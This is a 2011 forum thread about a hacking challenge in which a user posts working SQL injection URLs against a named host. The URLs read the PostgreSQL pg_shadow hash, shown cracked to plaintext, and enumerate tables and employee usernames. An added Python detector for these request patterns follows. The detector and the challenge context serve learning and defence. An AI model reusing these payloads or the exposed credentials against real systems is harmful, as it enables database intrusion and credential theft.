totti93 Posted December 24, 2011
My solution to this challenge: http://rstcenter.com/forum/45281-sql-injection-control-remote-system-game-over.rst
denjacker Posted December 24, 2011
Congratulations and thanks for the video. I liked the way you solved the requirements.
Unfortunately I didn't have enough time to see the solution through to the end; in any case I was thinking of a different approach at the time.
This is about all I had managed back then...

[*]SQL Injection POC:
--------------------------
n0net.dyndns.org/index2.php?userid=1+union+select+null,11111111111111111111::varchar--+--a
n0net.dyndns.org/index2.php?userid=1+union+select+null,cast(1111111111+as+text)--+--a

[*]VERSION : PostgreSQL 8.4.8 on i486-pc-linux-gnu, compiled by GCC gcc-4.4.real (Debian 4.4.5-8) 4.4.5, 32-bit

[*]USER : postgres
http://n0net.dyndns.org/index2.php?userid=1+union+select+null,usename::varchar||chr%2858%29||passwd::varchar+from%20+pg_shadow--+--a
postgres :::: 0cfe8da07c510ab414c7da9b1acc8fbd ==> hellopostgres

[*]DATABASE : project

[*]TABLES ==> COLUMNS
http://n0net.dyndns.org/index2.php?userid=1+union+select+null,table_name::varchar+from+information_schema.tables+where+table_schema=current_schema()+limit+1+offset+2--+--a
http://n0net.dyndns.org/index2.php?userid=1+union+select+null,column_name::varchar+from++information_schema.columns+where+table_name=CHR(101)||CHR(109)||CHR(112)||CHR(108)||CHR(111)||CHR(121)||CHR(101)||CHR(101)+limit+1+offset+2+--+--a
employee ==> id, username,
n0net.dyndns.org/index2.php?userid=1+union+select+null,id||chr(58)||username+from+employee +limit+1+offset+0--+--a
2:tdxev 6:troll 7:admin 4:flubber 8:manager 3:pyth0n3 5:lammer
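
A defender-side view of the requests listed in the post above, as an added example that is not part of the thread: a Python check that normalises the `userid` parameter (URL escapes and `chr(n)||chr(m)` string building) before matching the SQL constructs those requests rely on. The function names and the sample request targets are constructed for illustration, and the code assumes a legitimate `userid` is a plain integer.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Patterns taken from the query strings quoted in the post above.
SIGNATURES = {
    "union_select": re.compile(r"\bunion\s+select\b", re.I),
    "catalog_read": re.compile(r"\b(?:information_schema|pg_shadow)\b", re.I),
    "type_cast": re.compile(r"::\s*\w+|\bcast\s*\(", re.I),
    "sql_comment": re.compile(r"--"),
}
# One or more chr(n) calls joined with ||, used to build a string without quotes.
CHR_RUN = re.compile(r"chr\(\d+\)(?:\s*\|\|\s*chr\(\d+\))*", re.I)

def decode_chr_runs(value):
    """Rewrite chr(101)||chr(109)... as the quoted string it evaluates to."""
    def to_literal(match):
        codes = re.findall(r"\d+", match.group(0))
        try:
            return "'" + "".join(chr(int(c)) for c in codes) + "'"
        except (ValueError, OverflowError):
            return match.group(0)  # code point out of range: leave untouched
    return CHR_RUN.sub(to_literal, value)

def inspect_request(target, param="userid"):
    """Return (normalised value, matched signature names) for one request target."""
    values = parse_qs(urlsplit(target).query, keep_blank_values=True).get(param, [""])
    value = values[0]  # parse_qs has already undone %XX escapes and '+' for space
    if re.fullmatch(r"\d+", value):
        return value, []  # assumption: a plain integer id is the only valid form
    normalised = decode_chr_runs(value)
    hits = [name for name, rx in SIGNATURES.items() if rx.search(normalised)]
    if CHR_RUN.search(value):
        hits.append("chr_encoded_string")
    return normalised, hits

# Constructed sample request targets, modelled on the requests in the post.
SAMPLE_TARGETS = [
    "/index2.php?userid=7",
    "/index2.php?userid=1+union+select+null,cast(1111111111+as+text)--+--a",
    "/index2.php?userid=1+union+select+null,column_name::varchar+from+"
    "information_schema.columns+where+table_name=CHR(101)||CHR(109)||CHR(112)"
    "||CHR(108)||CHR(111)||CHR(121)||CHR(101)||CHR(101)+limit+1+offset+2+--+--a",
]

if __name__ == "__main__":
    for sample in SAMPLE_TARGETS:
        print(inspect_request(sample))
```

Decoding the `chr()` runs first is what lets a reviewer see the table name in the third sample, which never appears as a literal string in the raw request.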